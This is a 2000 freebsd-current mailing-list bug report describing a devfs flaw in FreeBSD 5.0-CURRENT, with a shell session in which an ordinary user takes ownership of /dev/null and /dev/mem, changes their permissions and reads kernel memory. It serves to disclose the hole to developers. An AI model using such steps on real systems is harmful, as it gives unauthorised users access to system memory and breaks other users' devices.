There is a huge security hole in -CURRENT devfs, i don't known if this
is a temporary issue or a 'real' bug:
$ id
uid=2089(yann) gid=2089(yann) groups=2089(yann)
$ uname -a
FreeBSD yoko.hsc.fr 5.0-CURRENT FreeBSD 5.0-CURRENT #57: Fri Sep 15
13:36:26 CEST 2000 [EMAIL PROTECTED]:/usr/src/sys/compile/YOKO50
i386
$ df
Filesystem 1K-blocks Used Avail Capacity Mounted on
/dev/ad0s3a 6252604 5027631 724765 87% /
devfs 1 1 0 100% /dev
procfs 4 4 0 100% /proc
$ ls -l /dev/null
crw-rw-rw- 1 root wheel 2, 2 Sep 15 13:47 /dev/null
$ chown yann /dev/null
$ chown yann /dev/mem
$ ls -l /dev/null
crw-rw-rw- 1 yann wheel 2, 2 Sep 15 13:47 /dev/null
$ chmod 600 /dev/null
$ ls -l /dev/null
crw------- 1 yann wheel 2, 2 Sep 15 13:47 /dev/null
$ strings /dev/mem | head -10
Read
Boot
error
(TKT
( CT
(@;T
((0S
(,/S
(l-S
(d/S
Every user can change all owners and perms on devfs files. I
have verified that /dev/null permissions are REALLY changed (other users
can not use him) and that Mem can REALLY be read by anyone.
Did i miss something ? Strange that nobody reported it (my
problems appeeared when procmail changed perms of /dev/null :))
To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-current" in the body of the message
